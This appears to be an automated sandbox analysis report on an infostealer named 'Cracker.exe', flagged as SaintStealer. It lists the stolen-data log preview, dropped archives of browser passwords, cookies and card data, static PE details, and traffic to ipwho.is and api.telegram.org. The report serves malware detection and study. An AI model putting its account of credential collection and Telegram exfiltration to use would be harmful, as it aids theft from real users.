                                                    Preview:..- IP Info -....IP: 173.254.250.90..Country: United States..City: Dallas..Postal: 75201..ISP: Quadranet Enterprises LLC - A8100..Timezone: -06:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: .. - 3CYSMP (1280, 1024)..HWID: 7263582169614543..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\Cracker.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -......Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 30...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Others: ..

                                                    C:\Users\user\AppData\Local\Temp\Web Data

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1373607036346451
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                    MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                    SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                    SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                    SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zoqbz1b.4a1.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czmeriun.vf5.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                    C:\Users\user\AppData\Local\Temp\out.zip

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                    Category:dropped
                                                    Size (bytes):935759
                                                    Entropy (8bit):7.568960594662551
                                                    Encrypted:false
                                                    SSDEEP:12288:vIHaq3vcF6Vmf0ygWavkyqr5jSKzPSEDdYu+obWLbtEwoSCcA/8zeppDAaIwis5k:vItPVm85qr5jtzPdDdY6bJScjiUk
                                                    MD5:B170D60627B704E816DDA34424444A40
                                                    SHA1:BD79C741E8A021A43EA3B457C4796FC5F8BACAEE
                                                    SHA-256:11961873AC2D0B46ED17A679967747CCDE707433769B0E9650A6CB77F08DC6D0
                                                    SHA-512:A2270AFEF82114EAC0AFD925572E9C3B13CB815E93E4D31D78D64FFD1982113CA6FFF4638C2A23D5FD6E7634F0E4D1A38F1DE815A8709BB58B5A72D2999C423C
                                                    Malicious:false
                                                    Preview:PK.........^hY................Autofill/PK.........^hY................Cookies/PK.........^hY................CreditCards/PK.........^hY................Downloads/PK.........^hY................History/PK.........^hY................Passwords/PK.........^hYh.^d...d.......screen1.png.PNG........IHDR................C...+IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                                                    C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                    Category:dropped
                                                    Size (bytes):22466
                                                    Entropy (8bit):7.84152039990611
                                                    Encrypted:false
                                                    SSDEEP:384:snZTcGKx9Zh9tnVS38uVS38M/knZTcGKx9Zh9tnVS38uVS38M/Xw:sn+GKxDhX9+Mcn+GKxDhX9+MI
                                                    MD5:802D4D78AF9EBAAC40883960E962C014
                                                    SHA1:270F0A639E3E4B634CDE83F755FBBEE833E766AC
                                                    SHA-256:1A163D89833665304EC1514C45F7D1ACB9128DDAAD220A50EAC7F8A4EAD846DE
                                                    SHA-512:4F0E90EE289EEB9313D90B46267ECD067AC5C5872E6B69E1F31D00A7C8A6FC0F72A719B66FB0586AA6B23774DE93DA9002385495CE4DAA4E9D41075EF007814C
                                                    Malicious:false
                                                    Preview:PK.........^hYA.]............EFOYFBOLXA.png..In@!.C..z.0C ..~...Re...u.s......o.v.!...4...Z...w...dgg....../.i3$......a..O.....-A9r.&..?..K@Zt1.no.7UL..^.b&......p.S.Ua6"..]i...e.5..f.p..k..G.%..LI...a.....|...E.}..G....>.....yS..=...0p...YQ...j ..H...$......).i.....]S.C...W..*..1....u.....t.a%....D.....0...R.O..g3....;Z=;<CG.D8..Z.Sjf....[...V.(z...e...~ZY.....W...R.^..+5..p..{^. .G.us.....{.M.z...s.....<.T....o.jv...."4..c....2.c0e.s.6.:{....6..Dk.[...Y.i.z.c.-.Rq9a..s.t..>}..'kBo.\...Z...Q..J..6.....q.h@7s.....%..'.n.v.dK..X..{u..~B.:.-r...Uox.h.8.._A.[Q....P....Q"....3AV..i...g.....5...|...Owoh......@l.....d.Cv~[.S...V5^..f..+.G..\.....PK.........^hY..d)............GAOBCVIQIJ.png..I.E!.E...GE.^......r.....B.ha.6...j5....CgC.k.....w#.-U...;....4.KB..dL.......zQo....m...oV2..~...Lm....`}@4..PQ<...L"-...d...j}}....u'............Cn...3h.....g*....V.+..i..o..=...E.d.:......)$..>Kb....x.:)....,.....#..{$.Bni...:Gc.....U...Z..r+...u...

                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

                                                    Download File
                                                    Process:C:\Users\user\Desktop\Cracker.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):32768
                                                    Entropy (8bit):0.017262956703125623
                                                    Encrypted:false
                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                    Malicious:false
                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):7.946417718933471
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 81.26%
                                                    • UPX compressed Win32 Executable (30571/9) 12.30%
                                                    • Win64 Executable (generic) (12005/4) 4.83%
                                                    • Generic Win/DOS Executable (2004/3) 0.81%
                                                    • DOS Executable Generic (2002/1) 0.81%
                                                    File name:Cracker.exe
                                                    File size:2'269'184 bytes
                                                    MD5:0f8507a31b1a48f31f26321c9762a513
                                                    SHA1:283e32ff498f529b4d1d8e9d0fecb44b7a219758
                                                    SHA256:b0bfae6412f70f426f3cbb56091f5cc157821b591a3391f68ddead55479f93c8
                                                    SHA512:3a53b924b0c3358fd0781eeb76f5141c586e51f54fb9e000866eb4c906235ce9b01e5c8903279f27791401a7d81f9db40afe3081d88952ae3a4ed955c3ab67cd
                                                    SSDEEP:49152:3gxqu3RcnLHx7FHNwA5VRp/KQiGH+7W7WFDus/3BcSJir2Vn:wQLVFthRhiY7Cus/3F4qV
                                                    TLSH:44B533FC1ED19073D8BED8FB6149D4E3448A723A5A8C82D74D7EDC4396B01A65E8C81E
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.dC?...?...?...6...-..._......._...2..._...6.......)...+...<...?.......[...%...?...8...[...>...Rich?..........................

                                                    File Icon

                                                    Icon Hash:00928e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x140545f00
                                                    Entrypoint Section:UPX1
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x672C8260 [Thu Nov 7 09:03:28 2024 UTC]
                                                    TLS Callbacks:0x405461a5, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:e8effc9201cf1e60acc68af88aec3bd3

                                                    Entrypoint Preview

                                                    Instruction
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push ebp
                                                    dec eax
                                                    lea esi, dword ptr [FFDD70F5h]
                                                    dec eax
                                                    lea edi, dword ptr [esi-0031C000h]
                                                    dec eax
                                                    lea eax, dword ptr [edi+0051E7B8h]
                                                    push dword ptr [eax]
                                                    mov dword ptr [eax], 5F69D95Eh
                                                    push eax
                                                    push edi
                                                    xor ebx, ebx
                                                    xor ecx, ecx
                                                    dec eax
                                                    or ebp, FFFFFFFFh
                                                    call 00007F87C0822E75h
                                                    add ebx, ebx
                                                    je 00007F87C0822E24h
                                                    rep ret
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    rep ret
                                                    dec eax
                                                    lea eax, dword ptr [edi+ebp]
                                                    cmp ecx, 05h
                                                    mov dl, byte ptr [eax]
                                                    jbe 00007F87C0822E43h
                                                    dec eax
                                                    cmp ebp, FFFFFFFCh
                                                    jnbe 00007F87C0822E3Dh
                                                    sub ecx, 04h
                                                    mov edx, dword ptr [eax]
                                                    dec eax
                                                    add eax, 04h
                                                    sub ecx, 04h
                                                    mov dword ptr [edi], edx
                                                    dec eax
                                                    lea edi, dword ptr [edi+04h]
                                                    jnc 00007F87C0822E11h
                                                    add ecx, 04h
                                                    mov dl, byte ptr [eax]
                                                    je 00007F87C0822E32h
                                                    dec eax
                                                    inc eax
                                                    mov byte ptr [edi], dl
                                                    sub ecx, 01h
                                                    mov dl, byte ptr [eax]
                                                    dec eax
                                                    lea edi, dword ptr [edi+01h]
                                                    jne 00007F87C0822E12h
                                                    rep ret
                                                    cld
                                                    inc ecx
                                                    pop ebx
                                                    jmp 00007F87C0822E2Ah
                                                    dec eax
                                                    inc esi
                                                    mov byte ptr [edi], dl
                                                    dec eax
                                                    inc edi
                                                    mov dl, byte ptr [esi]
                                                    add ebx, ebx
                                                    jne 00007F87C0822E2Ch
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    jc 00007F87C0822E08h
                                                    lea eax, dword ptr [ecx+01h]
                                                    jmp 00007F87C0822E29h
                                                    dec eax
                                                    inc ecx
                                                    call ebx
                                                    adc eax, eax
                                                    inc ecx
                                                    call ebx
                                                    adc eax, eax
                                                    add ebx, ebx
                                                    jne 00007F87C0822E2Ch
                                                    mov ebx, dword ptr [esi]
                                                    dec eax
                                                    sub esi, FFFFFFFCh
                                                    adc ebx, ebx
                                                    mov dl, byte ptr [esi]
                                                    jnc 00007F87C0822E06h
                                                    sub eax, 03h
                                                    jc 00007F87C0822E3Bh
                                                    shl eax, 08h

                                                    Rich Headers

                                                    Programming Language:
                                                    • [IMP] VS2008 SP1 build 30729

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5470000x5b4UPX2
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5200000x14850UPX1
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5475b40x24UPX2
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x5461d00x28UPX1
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x5463c00x140UPX1
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    UPX00x10000x31c0000x0d41d8cd98f00b204e9800998ecf8427eunknownunknownunknownunknownIMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    UPX10x31d0000x22a0000x2296009fa353cad44e6c0a6db2598e5a3a3554unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    UPX20x5470000x10000x60026109ef07c8e9de0ec4d5d7876e18decFalse0.3841145833333333data3.8874308360620655IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Imports

                                                    DLLImport
                                                    advapi32.dllFreeSid
                                                    api-ms-win-crt-heap-l1-1-0.dllfree
                                                    api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                    api-ms-win-crt-math-l1-1-0.dlllog
                                                    api-ms-win-crt-runtime-l1-1-0.dllexit
                                                    api-ms-win-crt-stdio-l1-1-0.dll_set_fmode
                                                    api-ms-win-crt-string-l1-1-0.dllstrlen
                                                    api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                                    api-ms-win-crt-utility-l1-1-0.dllqsort
                                                    bcrypt.dllBCryptGenRandom
                                                    crypt32.dllCertOpenStore
                                                    gdi32.dllDeleteDC
                                                    KERNEL32.DLLLoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
                                                    ntdll.dllRtlUnwindEx
                                                    ole32.dllCoInitializeEx
                                                    oleaut32.dllVariantClear
                                                    rstrtmgr.dllRmGetList
                                                    secur32.dllDecryptMessage
                                                    user32.dllGetMonitorInfoW
                                                    ws2_32.dllbind

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-11-08T11:43:33.636300+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849728TCP
                                                    2024-11-08T11:44:11.715081+01002039009ET MALWARE Win32/SaintStealer CnC Response1149.154.167.220443192.168.2.849732TCP
                                                    2024-11-08T11:44:12.186266+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849733TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 8, 2024 11:43:50.179363966 CET4973180192.168.2.8108.181.61.49
                                                    Nov 8, 2024 11:43:50.184230089 CET8049731108.181.61.49192.168.2.8
                                                    Nov 8, 2024 11:43:50.184322119 CET4973180192.168.2.8108.181.61.49
                                                    Nov 8, 2024 11:43:50.185416937 CET4973180192.168.2.8108.181.61.49
                                                    Nov 8, 2024 11:43:50.190294027 CET8049731108.181.61.49192.168.2.8
                                                    Nov 8, 2024 11:43:51.342067957 CET8049731108.181.61.49192.168.2.8
                                                    Nov 8, 2024 11:43:51.342855930 CET4973180192.168.2.8108.181.61.49
                                                    Nov 8, 2024 11:43:51.348371983 CET8049731108.181.61.49192.168.2.8
                                                    Nov 8, 2024 11:43:51.348428011 CET4973180192.168.2.8108.181.61.49
                                                    Nov 8, 2024 11:44:09.553003073 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:09.553045034 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:09.553246021 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:09.566926003 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:09.566942930 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.423439980 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.423538923 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.427536011 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.427550077 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.427825928 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.478751898 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.563652039 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.563810110 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.563930035 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.563993931 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564090014 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564178944 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564224005 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564302921 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564318895 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564505100 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564528942 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564579964 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564615965 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564621925 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564663887 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564685106 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564721107 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564769983 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564799070 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564886093 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564908981 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.564922094 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.564964056 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565036058 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565045118 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565057039 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565082073 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565107107 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565124035 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565136909 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565149069 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565193892 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565203905 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565218925 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565218925 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565227985 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565258980 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565265894 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565323114 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565330982 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565332890 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565335989 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565356970 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565363884 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.565382957 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565450907 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565473080 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565524101 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565572977 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565640926 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565680981 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.565730095 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574518919 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574677944 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574702024 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574829102 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574836969 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574881077 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574888945 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574904919 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574934959 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574942112 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574969053 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.574978113 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.574996948 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575053930 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575177908 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575195074 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575212002 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575222015 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.575267076 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586429119 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.586688995 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586728096 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.586735964 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586752892 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586771011 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586795092 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586802959 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586812973 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586829901 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586844921 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586855888 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586874008 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586921930 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586962938 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.586996078 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587049961 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587066889 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587117910 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.587125063 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:10.591492891 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:10.600867987 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.654649973 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.713099003 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.713124990 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.714445114 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.714545965 CET49732443192.168.2.8149.154.167.220
                                                    Nov 8, 2024 11:44:11.714890003 CET44349732149.154.167.220192.168.2.8
                                                    Nov 8, 2024 11:44:11.714972973 CET49732443192.168.2.8149.154.167.220

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 8, 2024 11:43:50.169142008 CET5684853192.168.2.81.1.1.1
                                                    Nov 8, 2024 11:43:50.176264048 CET53568481.1.1.1192.168.2.8
                                                    Nov 8, 2024 11:44:08.710922003 CET5782853192.168.2.81.1.1.1
                                                    Nov 8, 2024 11:44:09.547338963 CET53578281.1.1.1192.168.2.8

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 8, 2024 11:43:50.169142008 CET192.168.2.81.1.1.10x1fa9Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                    Nov 8, 2024 11:44:08.710922003 CET192.168.2.81.1.1.10x73b4Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 8, 2024 11:43:50.176264048 CET1.1.1.1192.168.2.80x1fa9No error (0)ipwho.is108.181.61.49A (IP address)IN (0x0001)false
